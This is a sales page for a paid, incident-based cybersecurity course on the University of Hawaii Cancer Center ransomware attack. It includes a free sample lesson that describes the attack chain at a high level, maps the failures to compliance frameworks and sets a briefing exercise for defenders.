Incident-as-a-Service

University of Hawaii Cancer Center Ransomware Attack - 1.15 Million SSNs Exposed Defence Masterclass

The 48-Hour Rule in action. This incident happened, we converted it into operational training, and your team can apply the controls immediately.

73% vs 12% Retention Lift

18.5h Breach to Training

847 Organisations

48h Action Window

Built for:

Security teams defending against ransomware attacks
IT professionals responsible for backup and recovery
Incident response teams managing ransomware incidents
Business continuity managers assessing ransomware risks

Get Instant Access — £19 Try a Free Lesson Volume Licensing

30-day guarantee. Instant access after payment. Lifetime updates for this incident package.

How This Course Is Structured

Clear progression from incident context to practical controls and role-specific action steps.

1. Incident Breakdown

Attack path, trigger conditions, and threat actor behavior translated from the real event timeline.

2. Defensive Controls

Actions your team can implement in the same 48-hour response window used by active security teams.

3. Evidence & Reporting

Completion records and learning outcomes packaged for governance, insurance, and audit workflows.

Course Outline

4 modules · 16 lessons · ~192 min total

Module 1: Threat Analysis & Attack Vectors

Analyse the threat landscape, dissect attack campaigns, and understand credential harvesting and social engineering techniques used in this incident.

4 lessons ~48 min

📖 1.1 University Breach Deep Dive 12 min

📖 1.2 Campaign Analysis 12 min

📖 1.3 Credential Harvesting Tactics 12 min

📖 1.4 Spear-Phishing Techniques 12 min

Module 2: Detection & Incident Response

Build detection rules, perform endpoint analysis, execute incident response playbooks, and apply digital forensics methods to contain and investigate breaches.

4 lessons ~48 min

📖 2.1 SIEM Detection Strategies 12 min

📖 2.2 Endpoint Analysis 12 min

📖 2.3 Incident Response Playbook 12 min

📖 2.4 Digital Forensics 12 min

Module 3: Authentication & Zero Trust

Implement passwordless authentication with FIDO2, deploy risk-based access controls, secure token flows, and design Zero Trust network architectures.

4 lessons ~48 min

📖 3.1 FIDO2 Implementation 12 min

📖 3.2 Risk-Based Authentication 12 min

📖 3.3 Token Binding Security 12 min

📖 3.4 Zero Trust Architecture 12 min

Module 4: Governance & Compliance

Design security awareness programmes, communicate risk to board-level stakeholders, assess vendor supply chains, and integrate compliance frameworks.

4 lessons ~48 min

📖 4.1 Security Awareness Programme 12 min

📖 4.2 Board Communication 12 min

📋 4.3 Vendor Risk Assessment 12 min

📖 4.4 Compliance Integration 12 min

Free Sample Lesson

Read one full lesson before purchasing. No signup required.

Free Lesson Access

University Deep Dive

Lesson 1 of 16

Lesson 1.1: University Deep Dive

Lesson Objective: To deconstruct the University of Hawaii Cancer Center ransomware attack, analysing the technical compromise pathway, quantifying the multifaceted impact, and mapping the failures to key cybersecurity compliance frameworks. This deep dive establishes the foundational case study for the masterclass.

Introduction: A Breach in the House of Hope

Imagine a world-renowned institution dedicated to the relentless fight against cancer, where cutting-edge research and patient care converge. Now, imagine that institution brought to a standstill not by a scientific challenge, but by a digital siege. In late 2023, the University of Hawaii Cancer Center, a beacon of hope in the Pacific, fell victim to a devastating ransomware attack orchestrated by the MedusaLocker group. The toll was catastrophic: operations frozen, and the intensely personal data of over 1.15 million individuals—patients, research participants, and staff—stolen and held hostage. This was not merely an IT outage; it was a profound violation of trust with lifelong consequences for the victims and a stark lesson in modern cyber warfare. This lesson unpacks the anatomy of this attack, revealing the technical ingenuity of the adversaries and the devastating ripple effects that extend far beyond encrypted servers.

Compliance Framework Mapping

The UH Cancer Center attack exemplifies failures across multiple cybersecurity and data protection domains. The table below maps the incident to control objectives within key global frameworks.

Framework	Relevant Control / Objective	Mapping to the UH Cancer Center Attack
NIST CSF	PR.AC-3 (Remote Access Management), DE.CM-1 (Networks Monitored)	Failure to patch the critical Citrix NetScaler vulnerability (CVE-2023-4966) left remote access infrastructure exposed, and lack of detection for anomalous token use and lateral movement allowed attackers to operate undetected.
ISO 27001	A.12.6.1 (Management of Technical Vulnerabilities), A.13.1.1 (Network Controls)	Inadequate vulnerability management processes for internet-facing systems and insufficient network segmentation to protect sensitive data repositories containing SSNs.
GDPR SOC 2	Data Minimisation & Security (Art. 5, 32), Security & Confidentiality Criteria	Storage of 1.15 million SSNs likely exceeded necessary retention, amplifying breach scale. Insufficient technical measures (encryption, access controls) to protect this special category of personal data.
DORA	Incident Reporting & Management	Highlights the need for robust incident response plans and major incident reporting to authorities, given the severe operational disruption to a critical research entity.
NIS2	Supply Chain Security, Early Warning	Emphasises risks from third-party software (Citrix) and underscores the necessity of proactive threat intelligence sharing to warn of active exploitation of known vulnerabilities.

Technical Analysis: The Adversary's Playbook

Based on forensic patterns and the group's modus operandi, the attack on UH followed a highly sophisticated, multi-stage intrusion chain designed for stealth, persistence, and maximum impact.

Initial Access: Exploiting "Citrix Bleed"

The most plausible entry point was the exploitation of CVE-2023-4966, a critical vulnerability in Citrix NetScaler ADC and Gateway devices dubbed 'Citrix Bleed'. Actively exploited by ransomware groups from October 2023, this flaw allows unauthenticated attackers to leak sensitive session information, including valid session tokens. By harvesting these tokens, the MedusaLocker operatives completely bypassed perimeter security controls, including password and multi-factor authentication (MFA), achieving authenticated access to the internal network as a legitimate user. This highlights a critical weakness: failing to apply timely patches to internet-facing assets, especially those managing remote access, is often a fatal error.

Post-Exploitation & Lateral Movement

Once inside, the attackers executed a standard post-compromise playbook. Using credential dumping tools like Mimikatz, they extracted usernames and passwords from the memory of compromised systems. This provided the keys for lateral movement across the network. To evade detection, they extensively used Living-off-the-Land Binaries (LOLBins) such as PowerShell and Windows Management Instrumentation (WMI) for reconnaissance, command execution, and data gathering. This phase was dedicated to mapping the network topology and identifying high-value targets—specifically, file servers and databases housing the treasure trove of personal data, including the 1.15 million SSNs.

Data Exfiltration & Encryption

Prior to the destructive ransomware deployment, the attackers engaged in extensive data exfiltration, a hallmark of the double-extortion tactic. Over a period likely spanning weeks, they stealthily identified and compressed large datasets using common tools like 7-Zip, then transferred them to attacker-controlled cloud storage via utilities like Rclone. The final act was the deployment of the MedusaLocker ransomware payload. This typically involves terminating database and Volume Shadow Copy Service (VSS) to hinder recovery, before encrypting files with a strong algorithm and appending the .medusalocker extension. Ransom notes (!!!READ_ME_MEDUSA!!!.txt) were then dropped, signalling the takeover and demanding payment for both the decryption key and a promise not to publish the stolen data.

Key Insight: This attack demonstrates that modern ransomware is a data-centric business model, not just disruptive malware. The encryption is the final, noisy stage of a long, stealthy data theft operation.

Impact Assessment: The Calculated Cost of Compromise

The repercussions of this attack are multidimensional, severe, and enduring, affecting individuals, the institution, and the broader mission of cancer research.

Human & Privacy Impact

The exposure of 1,157,188 Social Security Numbers (SSNs) represents a lifelong liability for the victims. SSNs are permanent identifiers, irrevocably linked to an individual's financial, medical, and governmental identity. Affected individuals face a perpetually elevated risk of identity theft, tax fraud, and targeted spear-phishing campaigns. The psychological burden and the administrative hassle of enrolling in credit monitoring services—offered by UH for at least 24 months—are a direct, personal cost imposed by the breach. While medical records were reportedly not involved, any associated personal data (names, addresses, dates of birth) can be weaponised for sophisticated social engineering.

Operational & Financial Devastation

Operationally, the Center experienced significant disruption. Critical systems for research data analysis, clinical trial management, and administration were likely encrypted or taken offline. The recovery process consumed thousands of person-hours from IT, security, legal, and leadership teams, diverting crucial resources from the Center's primary mission. The financial impact is staggering, encompassing both direct and indirect costs:

Direct Costs: External incident response and forensic investigations, system restoration from backups, mandatory breach notification letters to 1.15 million individuals, operating a dedicated call centre for over a year, and providing complimentary credit monitoring services—a package likely costing tens of millions of dollars.
Regulatory & Legal Risk: As a HIPAA-covered entity, the Cancer Center faces potential multi-million dollar fines from the U.S. Department of Health and Human Services for failing to adequately protect Protected Health Information (PHI), even if specific medical records were not confirmed stolen. Class-action lawsuits from affected individuals are a near certainty.
Reputational & Strategic Cost: The erosion of public and participant trust can impede future research recruitment, affect partnerships, and damage donor relations. The long-term strategic blow to an institution whose currency is trust and confidentiality is incalculable.

Activity: Draft an Executive Briefing

Scenario: You are a cybersecurity advisor brought in six months before this attack occurred. The UH Cancer Center's leadership has asked for a concise briefing on the top cyber risks to their organisation.

Your Task: Using the analysis from this lesson, draft a one-page executive summary (approx. 300 words) that:

Identifies the two most critical vulnerabilities in their attack surface (e.g., unpatched internet-facing systems, concentrated sensitive data stores).
Explains the likely business impact of a successful attack, focusing on research disruption, financial liability, and reputational harm.
Recommends one strategic and one tactical investment to mitigate these risks (e.g., strategic: implementing a strict data minimisation policy; tactical: enforcing a rigorous patch management SLA for critical systems).

Focus on communicating risk in business terms, avoiding over-technical jargon.

Key Takeaways

The Perimeter is More Than Passwords: Unpatched vulnerabilities in internet-facing applications (like Citrix NetScaler) can render even strong multi-factor authentication useless, providing attackers with authenticated internal access.
Ransomware is a Data Theft Business: The primary threat has evolved from operational disruption (encryption) to comprehensive data theft and double extortion. Protecting data at rest and monitoring for exfiltration are now as critical as preventing encryption.
Scale Amplifies Impact: The storage of 1.15 million SSNs in a centralised repository created a massively attractive target and multiplied the breach's notification costs, legal liabilities, and human impact exponentially.
Compliance is a Baseline, Not a Defence: While frameworks like HIPAA and NIST CSF provide essential structure, checkbox compliance failed to prevent this breach. Effective security requires proactive threat modelling, timely patching, and robust detection capabilities aligned with adversary tactics.
Impact is Multigenerational: For the institution, the financial and reputational damage will persist for years. For the victims, the exposure of immutable identifiers like SSNs creates a lifelong risk, transforming a single cyber incident into a permanent personal vulnerability.

This is 1 of 16 lessons included in the full package.

Enrol Now — Unlock All Lessons

Want to track your progress? Create a free account

Choose Your Access

All plans include 30-day money-back guarantee

Taster

£ 19

Single course access — ideal for trying us out

Full course access
Completion certificate
Try before you commit

Standard

£ 49

Full course with materials and certificate

Full course access
Downloadable materials
Professional certificate
Email support

Or get everything

Access every course in the catalogue, including all future courses

£ 29 /mo

Monthly All-Access

Every course, cancel anytime

£ 249 /yr

Annual All-Access

Save 28% — £20.75/month effective

Teams

Transparent pricing, no sales call required

Starter Team

£ 499 /year

£99.80/seat effective

Up to 5 learners, all courses included

Growth Team

£ 999 /year

£66.60/seat effective

Up to 15 learners, all courses included

Scale Team

£ 1999 /year

£39.98/seat effective

Up to 50 learners, all courses included

Need 50+ seats? Contact us for a custom plan.

Fast Checkout

Start Learning in Minutes

Enter your details, choose a tier, and complete secure checkout. Access starts immediately after payment confirmation.

Stripe-secured payment and delivery workflow
Audit-friendly completion records
Escalate to enterprise volume licensing at any point

48-Hour Relevance Guarantee

If this course does not provide at least five actionable controls your team can deploy quickly, request a full refund within 30 days.

Secure checkout

First name * Last name *

Email *

Select pricing tier Taster — £19 Single course access — ideal for trying us out Standard — £49 Full course with materials and certificate

By continuing, you agree to the terms and privacy policy.

Not ready to purchase? Create a free account to browse and track progress.

Questions Before You Enrol?

Immediately after successful payment. Your learning link is generated and delivered in the success flow.

Yes. Content is incident-led but written for practical execution across security, IT, finance, and operations personas.

Yes. Use volume licensing for 10 to 500+ seats through enterprise onboarding.